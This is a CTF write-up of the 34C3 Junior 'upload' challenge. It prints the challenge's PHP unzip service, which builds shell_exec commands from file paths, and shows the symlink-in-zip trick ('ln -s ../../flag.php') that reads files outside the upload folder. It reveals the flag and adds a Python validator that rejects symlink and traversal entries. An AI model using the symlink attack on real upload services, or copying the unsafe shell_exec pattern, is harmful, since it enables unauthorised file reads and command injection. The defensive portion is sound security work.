34C3 Junior CTF - upload

December 28, 2017

Today we’re going to look into one of the challenges from 34C3 Junior CTF called upload.

This is a useful service to unzip some files.

We added a flag for your convenience.

Let’s take a look at the source code.

<?php
$UPLOADS = '/var/www/uploads/';
if(!empty($_FILES['uploaded_file'])) {
    // Housekeeping: delete uploads older than 120 seconds
    $paths = scandir($UPLOADS);
    $now = time();
    foreach($paths as $path) {
        if ($path == '.') {
            continue;
        }
        $mtime = filemtime($UPLOADS . $path);
        if ($now - $mtime > 120) {
            shell_exec('rm -rf ' . $UPLOADS . $path);
        }
    }
    // Each upload is unpacked into its own directory below the web root
    $path = $UPLOADS . uniqid('upl') . '/';
    if(!mkdir($path, 0777, true)) {
        die('mkdir failed');
    }
    $zip = $path . uniqid('zip');
    if(move_uploaded_file($_FILES['uploaded_file']['tmp_name'], $zip)) {
        // -j drops the directory part of archived names, -n never overwrites existing files
        shell_exec('unzip -j -n ' . $zip . ' -d ' . $path);
        header('Location: uploads/'. basename($path) . '/');
    } else {
        echo 'There was an error uploading the file, please try again!';
    }
} else {
?>
<!DOCTYPE html>
<html>
<head>
    <title>Upload your files</title>
</head>
<body>
<?php
    if (@$_GET['source']) {
        highlight_file(__FILE__); // "Show source" link: print this file
    } else {
?>
    <form enctype="multipart/form-data" method="POST">
        <p>Upload your file</p>
        <input type="file" name="uploaded_file"></input><br />
        <input type="submit"></input>
    </form>
    <a href="?source=1">Show source</a>
<?php
    }
?>
</body>
</html>
<?php
}
?>

The most important part is that the shell_exec function runs the unzip tool, unpacking the archive that we uploaded. We have to somehow get to the flag, which is located in the main directory. First, we’ll have to go 2 directories higher, so ../../ should be essential.

After a while I found out that we can simply compress symlinks, which will allow us to enter a file linked by the content of an archive. Let’s create this file.

ln -s ../../flag.php ./symlink.txt

Now we’re able to compress it and send it to the web service.

<head><title>Index of /uploads/upl5a46a1bef0d1f/</title></head>
<body bgcolor="white">
<h1>Index of /uploads/upl5a46a1bef0d1f/</h1><hr><pre><a href="../">../</a>
<a href="symlink.txt">symlink.txt</a>                                        27-Dec-2017 19:57                  48

After viewing the content of symlink.txt, we are provided with the content of the flag file.

$flag = "34C3_unpack_th3_M1ss1ng_l!nk"
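From the service's side, the way to close this hole is to inspect every entry before anything is unpacked and to refuse archives that carry symlinks. The following Python code is an added example, not part of the challenge source or the original post; the names rejected_entries, safe_extract and build_sample are hypothetical, and the sample archive is constructed in memory.

```python
import io
import os
import stat
import zipfile

UNIX = 3  # ZIP "version made by" host code for Unix; the file mode sits in the high 16 bits

def rejected_entries(data: bytes) -> list[tuple[str, str]]:
    """Return (name, reason) for each entry that must not be unpacked."""
    bad = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            mode = info.external_attr >> 16
            if info.create_system == UNIX and stat.S_ISLNK(mode):
                # For a symlink entry the stored "file content" is the link target.
                target = zf.read(info).decode("utf-8", "replace")
                bad.append((info.filename, "symlink -> " + target))
            elif info.filename.startswith("/") or ".." in info.filename.split("/"):
                bad.append((info.filename, "path traversal"))
    return bad

def safe_extract(data: bytes, dest: str) -> list[str]:
    """Refuse the whole archive on any finding, else write regular files flat."""
    findings = rejected_entries(data)
    if findings:
        raise ValueError(f"archive rejected: {findings}")
    written = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            name = os.path.basename(info.filename)  # flat layout, like unzip -j
            if not name:                            # directory entry
                continue
            with open(os.path.join(dest, name), "xb") as out:  # "x": never overwrite
                out.write(zf.read(info))
            written.append(name)
    return written

def build_sample(with_symlink: bool) -> bytes:
    """Constructed test archive: one regular file, optionally one symlink entry."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("notes.txt", "hello")
        if with_symlink:
            link = zipfile.ZipInfo("symlink.txt")
            link.create_system = UNIX
            link.external_attr = (stat.S_IFLNK | 0o777) << 16
            zf.writestr(link, "../../flag.php")
    return buf.getvalue()
```

Writing the entries out yourself instead of shelling out to unzip also means an uploaded link is never recreated on disk, even if the check is later relaxed.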

